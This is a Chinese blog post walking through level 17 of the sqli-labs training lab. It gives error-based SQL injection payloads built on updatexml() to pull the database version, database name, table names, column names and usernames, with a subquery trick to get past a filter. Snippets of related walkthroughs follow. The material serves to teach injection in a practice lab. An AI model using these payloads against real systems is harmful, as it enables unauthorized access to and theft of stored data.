sqli靶场学习记录-第十七关

最新推荐文章于 2024-06-01 15:23:48 发布
最新推荐文章于 2024-06-01 15:23:48 发布
阅读量127 收藏
点赞数
分类专栏: sql注入学习 文章标签: 学习 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50744304/article/details/132165623
版权

第十七关

17关可以先随便输入一点东西,可以看见页面显示红色的字样,没有其他东西,显示
在这里插入图片描述
同时可以发现输入框上面给了我们一个用户名,我们再来试试
在这里插入图片描述
输入用户名的同时在密码框输入1‘’会发现有报错信息,那么就可以进行报错注入

获取数据库版本

1' or updatexml(1,concat(0x7e,version()),1)-- qq
在这里插入图片描述

获取当前数据库名

1' or updatexml(1,concat(0x7e,database()),1)-- qq

获取当前库下的表名

1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1)-- qq

获取字段名

1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1)),1)-- qq

获取内容

1' and updatexml(1,concat(0x7e,(select username from (select username from users)a limit 3,1)),1)-- qq
加了过滤规则,updatexml不能直接放表名
(select username from users)a绕过

♚林影ᝰ
关注
专栏目录
Sqli-labs靶场第17详解[Sqli-labs-less-17]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 891
根据题目及测试发现,注入点在New Password上并且后台会判断user是否存在,所以user选择一个知道的name:admin或domo。如果当前会话用户对包含 DBMS 可用数据库信息的系统表有读取权限,则可以枚举出当前数据库列表。,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。单引号 '闭合 -- 报错注入。爆出DBMS 所有数据库
sqli-labs靶场17(基于post的更新查询报错注入)
qq_46527080的博客
12-18 810
知识点 updatexml()函数 updatexml()函数与extractvalue()类似,是更新xml文档的函数。 语法updatexml(目标xml文档,xml路径,更新的内容) updatexml(XML_document,XPath_string,new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:Xpath_String(Xpath格式的字符串) 第三个参数:new_value,String格式,替换查找到的符合条
sqli-labs第十七
m0_73248913的博客
02-11 360
sqli-labs第十七教程
sqli-labs-----第17
wyzhxhn的博客
11-10 849
基于报错的更新查新。
sqli2 第17
m0_69349614的博客
07-09 376
我们先按照这个网页的功能走一遍,目测是更改密码的页面,输入用户名之后用新密码覆盖旧密码。 切换到 Less 11 验证一下,可以看到此时 admin 用户的密码已经被我们所修改。 接下来判断注入类型,使用单引号闭合构造恒真条件,网页回显密码修改失败。 Copy Highlighter-hljs 测试一下所有的注入,发现这些注入网页都回显改密失败。 Copy Highlighter-hljs 抓包得知网页需要利用 POST 方法提交的参数格式如下: Copy Highlighter-hljs
sqlilabs靶场为例,讲解SQL注入攻击原理【15-17
最新发布
weixin_42515203的博客
06-01 1051
sqlilabs靶场为例,讲解SQL注入攻击原理
Sqli-labs-master超详细通教程(1-23基础篇)
m0_67391270的博客
06-12 3401
一到四主要是参数被包装的问题。一般用于尝试的语句Ps:–+可以用#替换,url 提交过程中 Url 编码后的#为%23and1=2–+'and1=2–+"and1=2–+)and1=2–+')and1=2–+")and1=2–+"))and1=2–+图中显示的sql语句是我为了方便理解,修改了源代码显示出的id =1 and 1=2页面正常,考虑是否有字符注入,先加单引号可以看到提示,存在’ '包装,我们加上–+http://127.0.0.1:8080/sqli-labs-master/Less-1/?
《从0到1000》sqli-labs1-75解题记录
BaiScorpio的博客
05-17 1274
1
sqli-labs靶场15-19过小记
xtx4506的博客
04-17 2764
level-15 首先判断是否有sql注入攻击,先输入万能密码’ or 1=1# 试了试发现登录成功 可以看到是存在sql注入的,输入单引号后不报错,推断可能是盲注,分析一下源码 可以看到报错信息是被注释的,所以可以采用布尔型或时间型盲注,因为我个人比较喜欢使用时间型盲注,所以可以一步一步推断出数据库,表,字段 然后一个一个爆字段就好啦,因为我这边已经知道库名,如果不知道的话可以使用ascii码一步一步缩小范围确定字符 payload:' and if(substr((select g
sql-labs 闯 5~10
qq_44663230的博客
08-14 1763
sql-labs 第5~10 盲注系列
sql-labs 闯 11~20
qq_44663230的博客
08-21 1581
sql-labs闯11~20
sqli-labs第十七详解
金 帛的博客
04-26 4394
sqlilabs第十七详解
Sqli-Labs靶场(17--20)题解析
weixin_46099095的博客
03-14 4199
Less-17:POST - Update Query - Error Based - String(POST - 更新查询 - 基于错误 - 字符串) 这里无论我们在User Name栏输入什么除了正确的用户名admin,他都会报错,难道这题就没有注入点啦? 来,我们先看一下源码 左边是Less-16的源码,右边是Less-17的源码,看不懂每系,我也看不懂,但是知道uname多了一个东
sqli-labs靶场第十七
gou1791241251的博客
12-27 919
十七有点特别,让我重置密码,但是注入的原理还是一样的。 在输入用户名的地方,我尝试了单引号,双引号,不输入,等测试去判断闭合方式,最终没有得到想要的结果 后来在输入密码的地方尝试了同样的操作,最终结果都是一样。。 实在没有了头绪我选择了代码审计! 在代码中可以看到,先是处理账号,如果账号存在,则才能重置密码,也就是说,如果账号不存在,输入密码也是没用的 在这里我们可以看到,后台接收到uname参数时,调用了一个函数进行过滤了用户输入的内容。但是没有对密码进行过滤,所以密码框才是真正的注入点 如果输入内容
sqli-lab第17~22随笔记
m0_52361291的博客
06-12 468
本来今天是说要到第25的但是到了第23我太菜了实在没看出来要咋做,用sqlmap跑了一下是利用延时注入的payload,我一开始想的是跟前面一样用的是联合注入,看了一下源代码也没看出来啥原因导致用的延时所以先休息总结一下前面的,23明天搞。在1~4sqlmap直接注入就行了 而在5~8中由于是布尔型注入所以在使用sqlmap注入时要加上 --technique B参数面对其他类型的盲注对应的参数是 在第9~10中是延时注入所以用到了 --technique T参数 11~16都是po
SQL 靶场
weixin_45971758的博客
05-19 737
学习文章。
SQL注入:sqli-labs靶场(1-37
热门推荐
qq_68163788的博客
02-03 1万+
sqli-labs是一个用于学习和练习SQL注入的开源项目。它提供了一系列的实验室环境,让用户能够在不同的SQL注入场景中进行练习和测试。这些场景包括基本的SQL注入、盲注、联合查询注入等等。 sqli-labs还提供了详细的说明和解释,帮助用户理解SQL注入的原理和技术。通过这些实验和学习,用户可以更好地了解SQL注入的危害,并学会如何防范和阻止SQL注入攻击
Pikachu靶场sql注入通
oiadkt的博客
03-07 5778
pickchu—sql注入通
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2到24SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值